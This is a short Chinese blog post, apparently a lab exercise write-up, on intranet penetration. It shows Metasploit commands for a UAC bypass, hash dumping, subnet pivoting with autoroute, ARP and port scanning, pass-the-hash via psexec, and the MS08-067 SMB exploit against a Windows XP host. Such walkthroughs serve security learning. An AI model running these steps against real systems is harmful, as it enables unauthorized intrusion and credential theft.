内网渗透bypassuac和smb溢出

对内网渗透需要渗透的目标主机处于跨网段和uac限制的情况做一个渗透记录

 

环境大致如下 拥有shell权限的win7(uac限制,处于双网段) 和同win7同一网段下暂时无权限的靶机xp

内网渗透bypassuac和smb溢出

 

先对有权限的win7进行hashdump

 内网渗透bypassuac和smb溢出

 

显示失败 getsystem一下

内网渗透bypassuac和smb溢出

 

 还是失败 msf的模块绕过uac

use exploit/windows/local/bypassuac

 

set session 1(session1 为我们的win7权限)

内网渗透bypassuac和smb溢出

 

此时再进入meterpreter  hashdumpgetsystem

内网渗透bypassuac和smb溢出

 

可以看到绕过了uac  获得了权限

 

导出了hash 接下来对和win7同网段的xp进行扫描探测

 

得到本地子网网段

run get_local_subnets

内网渗透bypassuac和smb溢出

 

处于192.168.100.0 子网掩码为255.255.255.0这个网段

run autoroute  -s 网段  添加路由  -p 查看已经添加的路由

内网渗透bypassuac和smb溢出

 

添加完成后  开始扫描

扫描存活ip

run post/windows/gather/arp_scanner RHOST=网段

内网渗透bypassuac和smb溢出

 

发现内网以下存在这些主机 其中192.168.100.5 是目标xp

 

 确定了目标 接下来扫描端口

内网渗透bypassuac和smb溢出

 

扫描端口

run axiliary/scanner/portscan/tcp

 

 

 

探测完信息后

 

可以通过之前抓的hash值 进行hash传递攻击

 

使用msf 下的exploit/windows/smb/psexec

 

 

 

也可以通过对应服务溢出漏洞 渗透拿到目标xp的权限

 

 

 

 

 开放了smb 使用了ms08_067 溢出成功

内网渗透bypassuac和smb溢出

 

posted @ 2018-12-16 22:32 卿先生 阅读(...) 评论(...) 编辑 收藏

相关文章:

  • 2021-05-11
  • 2022-01-17
  • 2021-12-15
  • 2021-10-06
  • 2021-12-06
  • 2021-09-27
  • 2022-01-12
  • 2021-06-15
猜你喜欢
  • 2021-08-11
  • 2023-01-06
  • 2021-06-07
  • 2022-12-23
  • 2021-11-18
  • 2021-12-23
相关资源
相似解决方案